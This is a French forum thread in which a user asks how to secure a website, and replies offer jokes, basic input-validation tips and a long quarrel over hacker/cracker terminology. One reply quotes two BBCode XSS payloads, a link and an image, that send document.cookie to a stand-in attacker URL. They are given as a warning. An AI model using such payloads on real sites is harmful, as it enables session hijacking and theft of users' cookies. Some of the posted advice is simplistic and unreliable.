Bijour tout le monde, je me remet en question depuis un certain moment sur se sujet :
Comment bien protégé son site .
Je voulait savoir si il y avait d'autre façon de se protéger du genre je sai pas moi ....
Parce que bien coder c'est une chose mais lutter contre des hakers c'en ai une autre
Alors merci pour vos reponse
( je ne veus pas de htmlentities, je sais ça comme tout le monde )

le seul et unique moyen de ne aps être hacké (et c'est une technique qui a été vérifiée et attestée comme la plus securitaire), c'est de gardé ton site sur le disque dur :p:p

serieux le risque 0 n'existe pas mais rassure toi, les hackers ont généralement rien à foutre du site minable du zero du coin (t'inquiète pas je m'inclue dedans).
Ben c'est vrai quoi t'as pas fait le site officiel de la maison blanche je suppose lol

donc le mieux c'est de pas s'en faire pour si peu et en cas faire des sauvegardes de temps en temps c tout

ne di pas ca, je veux vraiment savoir ...
Mais quand tu di sur le disque dur, tu parle du mien ?
Et puis on s'en fou de mon site je ne parle pas de lui pour l'instant ,ca viendra t'inquiette
Merci davoir rep comme meme

Apprend le hacking et met toi dans sa peau. Imagine ce qu'il tenterait pour détruire ton site et prévois des "pare-feux" scripté pour l'en empecher

lol ou peut on apprendre a hacker le site de rexumor alors ?
franchement c'est une bonne question, je saurais pas trop quoi répondre a ca, je hacke pas souvent les sites comme ca

Il existe des écoles contre le hacking, tu y apprends notamment à hacker... Pour comprendre les hackers...

c'est vrai, c'est normal, à la DST on apprend a espionner aussi ca parait assez logique ^^.
par contre j'aimerais quand même bien connaitre quelques petits "trucs" pour pas se faire avoir bêtement. en dehors bien sur des mises en gardes de mateo que j'ai lu conjsciensieusement

Ne confondez pas non plus hacker et cracker

Les deux peuvent s'introduire sur un site en utilisant une faille, mais seul le second va y faire des dégâts. En général il n'y a de risques qu'avec des données sensibles, ou des transactions pécuniaires ! Mais si tu gère un site avec juste tu contenu textuel il y a un risque vraiment minime

Le seul gros risque pour la plupart d'entre nous c'est un conn@rd qui essaie de se faire passer s pour un boss en informatique en cherchant des exploit sur Google et en les essayant sur ton site ! Pour ça la seule solution est de bien lire les tutos pour avoir un code 'propre' et donc plus dur à hacker

Les liens piégés ?

Citation : BBCode - Lien piégé

[url=javascript:window.open('www.sitekacker.com/recup_cookie.php?cookie='.document.cookie')]Cliquez tous ici ![/url]

Les images piégées ?

Citation : BBCode - Image piégée

[img]javascript:window.open('www.sitekacker.com/recup_cookie.php?cookie='.document.cookie')[/img]

Quoi, j'ai une mauvais influence ?

La solution est simple: suffit d'etre parano.
Chaque fois que tu demandes qqchose en POST/GET, tu vérifies que c'est bien ce que tu demandes qui arrive (si tu demandes un chiffre, tu vérifies que le mec a pas mis de lettre par exemple :°). Ca réduira pas mal les risques.
Sinon, cherche un peu sur google, tu trouveras les failles les plus souvent exploitées.

Salut

Déjà où fais-tu héberger ton site <=même si tu ne peux pas faire grand chose pour sécuriser les serveurs xD
Evite de mettre des scripts foireux (surtout en js )
Si c'est du xHTML pur, il n'y aura pas trop de pbs je pense

La plupart du temps les failles viennent de l'utilisateur directement, utilisation d'un troyen ou autre pour avoir les pass de ton FTP...
Prend un pass assez complexe pour éviter le cracker (c'est plus un hacker, c'est un lamer ^^) de pass (même si ça demande beaucoup de temps)

Et fais gaffe au cookies de traçage (même si il n'ya pas beaucoup de risque )

Généralement les grands hackers ne soucis pas trop d'un site "amateur" (enfin tout dépend du contenu ) et celui qui s'amuse à faire des "quote user ftp" "quote cwd ~root" ... il n'ira pas très loins

N'empêche c'ay rigolo' de voir des membres sortir leurs déf' de "hacker" & co.
Y'a pas 36 000 sources possibles de failles, hein. La sécurité du serveur en lui-même, pour ta part ça te concerne sûrement pas. Si ton site est tout en xHTML et n'utilise PHP que pour afficher la date, pense bien que tu risque rien. Tu réfléchis à tout ce en quoi l'utilisateur pourrait faire quelque chose de non prévu et tu gères. Bien sûr, ça dépend du type de site que tu fais.

Citation : .Nico

Ne confondez pas non plus hacker et cracker

et toi confond cracker et crasheur

crasheur c'est celui qui va destroy son site

cracker c'est celui qui crée des crack pour des logiciels

Citation : ThE.13eSt

Citation : .Nico

Ne confondez pas non plus hacker et cracker

et toi confond cracker et crasheur

crasheur c'est celui qui va destroy son site

cracker c'est celui qui crée des crack pour des logiciels

Et lamer, c'est celui qui a un pseudo comme le tient, c'est ça? J'ai bien retenu la leçon?

cracking = modification illégale de softwares
hacking = accès a des systemes de securité de façon illegale
hacker crasher: idem, mais à des fins pas très sympa, alors que le vrai hacker s'infiltre dans les systemes pour trouver des failles, et aider le webmaster.

Sinon code seulement en xHTML !

EDIT: Ta tout compris Victor

Mais on en a tellement rien à foutre de la définition de cracker, crasher, hacker, webmaster, lamer,..., que le prochain qui sort un soit-disante définition d'un de ces terme se prend 5% pour flood. Merci.

[edit de louisclem] Ouais bien dit j'en ai marre que ce soit moi qui mette les % ou qui doive dire ça. Puis, je vous le rappelle, considérez simplement que ce mot à deux sens (celui du "vrai" hackeur et celui du "méchant" qui fait du piratage). Alors, taisez vous. D'ailleurs c'est souvent les mêmes qui viennet répéter ça....

j'ai bien envie de définir le flood également... enfin bon, sinon c'est quoi les htmlentities ?

edit pour répondre à l'edit de louisclem: j'ai l'impression qu'on parle de moi ...

et si on parle des crackers de lu ça va ?

Citation : victor

Et lamer, c'est celui qui a un pseudo comme le tient, c'est ça? J'ai bien retenu la leçon?

quesqu'il a mon pseudo? -.-

Citation : conno

et si on parle des crackers de lu ça va ?

Ou de lamer michelle...
Enfin quoi qu'il en soit, je qu'ont t'a tout dit. Tu joue au parano, mais tu te met en tête qu'un site inviolable n'existe pas. Même le SdZV3 (okay, il est super protégé, j'admet), c'est ca le monde et les risques du web

Tu peux te protéger d'un lamer mais on ne sera jamais a l'abri des cracker car ils sont très puissants et tout comme les hackers ( qui eux ( les hackers ) aides les webmaster ) ils font partis des meilleurs informaticiens du monde.

PS : les crackers ne sont pas des personnes qui servent a crée des cracks ( malgrès qu'ils en fasses quelques uns ).

PS : néo-chaotic je te trouve toujours dans les topics qui parle de " hack ". mdr

Citation : ramm67

on ne sera jamais a l'abri des cracker car ils sont très puissants et tout comme les hackers ( qui eux ( les hackers ) aides les webmaster ) ils font partis des meilleurs informaticiens du monde.

Toi, t'as tout compris.

Citation : ThE.13eSt

Citation : victor

Et lamer, c'est celui qui a un pseudo comme le tient, c'est ça? J'ai bien retenu la leçon?

quesqu'il a mon pseudo? -.-

n0N r13¦\|
|1 357 7rè5 b|3n 70n p53ud0

boah a l'epoque ou je l'ai fait j'avais encore jamais entendu le mot l33t

Citation : ramm67

Tu peux te protéger d'un lamer mais on ne sera jamais a l'abri des cracker car ils sont très puissants et tout comme les hackers ( qui eux ( les hackers ) aides les webmaster )

T'as oublié de parler des modérateurs... Eux aussi sont très puissants, et tu n'en es pas à l'abri...

PS : +5%
PS : Tiens, ils ont encore frappé...

Lit le magaziene Hackademy, system addict ou plein d'autre, y'a pas mal de conseil interesent !

Tu me fais rire. Je l'attends le jour ou les moderateurs seront aussi puissant qu'un hacker.

Et le modéhackeur ?

Citation : Asgeir

Et le modéhackeur ?

Mdr. Bien trouvé le jeu de mots. Ok dans ce cas le modérateur est aussi puissant qu'un hacker mais il ni a pas de modéhacker sur ce site ( enfin ca m'étonnerai ).

ramm67 évite de chercher tu risque d'avoir pas mal de % ...
Sinon laisse pas présager une mauvaise image de moi en disant que je traine dans les topics de hacking lol
Et puis evitons le hors sujet, sinon je propose que ce sujet devrait etre fermé puisque la question est résolue.
Ton pseudo est de type lamer car il utilise l'ecriture 'c0w-b0y' ou, faussement choisie pour le nom, '31337'.

edit: la puissance du moderateur c'est la puissance qu'il a à pouvoir te bannir. Il n'y a eu aucune comparaison a la puissance du hacker, en termes d'infiltration de sécurités.